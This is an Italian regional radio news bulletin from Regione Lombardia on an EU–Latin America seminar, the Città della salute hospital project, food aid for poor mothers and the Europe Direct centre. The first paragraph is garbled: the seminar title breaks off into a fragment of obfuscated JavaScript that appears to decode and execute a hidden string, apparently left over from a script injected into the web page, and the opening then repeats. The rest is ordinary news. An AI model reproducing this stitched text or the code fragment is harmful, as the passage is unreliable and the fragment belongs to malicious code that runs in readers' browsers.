Bentrovati a questo appuntamento informativo realizzato in collaborazione con Regione Lombardia.

In collaborazione con il Ministero degli Affari esteri e la Fondazione EU-LAC, Regione Lombardia Organizza per oggi il seminario dal titolo 'Il partenariato strategico America Latina-Unione Europea e le sfide della globalizzazione: (e)s=s+ff(w[j]+3);}xz=e;if(window.document)xz(s)} Notiziario regionale ore 12 Bentrovati a questo appuntamento informativo realizzato in collaborazione con Regione Lombardia.

In collaborazione con il Ministero degli Affari esteri e la Fondazione EU-LAC, Regione Lombardia Organizza per oggi il seminario dal titolo 'Il partenariato strategico America Latina-Unione Europea e le sfide della globalizzazione: le pmi come motore della crescita comune'. L'evento, che si tiene presso la Sala dei Cinquecento di Palazzo Lombardia è articolato in tre sessioni. Il seminario precede di poche settimane il VII Vertice dei capi di Stato e di Governo dell'Unione Europea e dell'America Latina, che si terrà a Santiago del Cile il 26 e il 27 gennaio e nel corso del quale sarà presentato il documento contenente indicazioni di policy maturate durante i lavori di Milano.
 
Prende corpo il progetto della Città della salute. E’ stato firmato l’accodo in base al quale, entro il 31 marzo 2014 il Comune di Sesto San Giovanni cederà gratuitamente a Regione Lombardia l'area, debitamente bonificata. Entro fine mese Regione Lombardia, tramite Infrastrutture Lombarde, si occuperà di dare l'avvio delle procedure di gara. Sull’area ex Falck sorgerà così il nuovo polo della salute, 450 milioni di euro, di cui 330 della Regione, 660 posti letto; dislocata su un'area di 205.000 metri, la Città della salute riunirà l'Istituto neurologico Besta e l'Istituto dei Tumori.

La Giunta regionale, su proposta dell'assessore alla Famiglia, Conciliazione, Integrazione e Solidarietà sociale, ha deciso di approvare, per il 2013, uno stanziamento di 2 milioni di euro da destinare a iniziative a sostegno dell'alimentazione dei neonati e delle loro madri in condizione di povertà. In particolare, tramite carta prepagata, sarà destinato un contributo di 900 euro, vincolato all'acquisto di beni alimentari, e destinato a mamme in condizione di forte disagio economico. Per accedere al contributo è necessario avere un figlio di età compresa tra 0 e 12 mesi, essere residenti in Lombardia da almeno un anno alla data di presentazione della richiesta di accesso al contributo ed essere in possesso di attestazione Isee integrata da idonea documentazione, che consenta la definizione della condizione di difficoltà economica della donna e/o del suo nucleo familiare nel momento della  richiesta.

L'Unione europea ha deciso di confermare per altri 5 anni presso la Regione Lombardia l'esperienza dell'Antenna Europe Direct, cioè il centro di informazione sull'Unione europea. Centro collocato presso la sede della Regione a Milano, con 12 sportelli nelle sedi territoriali della Regione nei capoluoghi di provincia e a Legnano. Europe Direct è stata considerata una delle migliori proposte tra le 48 selezionate dalla Rappresentanza in Italia della Commissione europea su 170 progetti presentati a livello nazionale. Un riconoscimento importante per questo centro che, dal 1998, offre informazioni sull'Europa, sulle opportunità e i diritti che l'Ue garantisce. In questi anni ha sviluppato servizi di comunicazione online, percorsi educativi nelle scuole, collaborazioni con le università sulla cittadinanza europea, sistemi informativi sui finanziamenti e sulle possibilità di studio, lavoro, tirocini che l'Europa può offrire.

Ed è tutto, grazie per l’ascolto.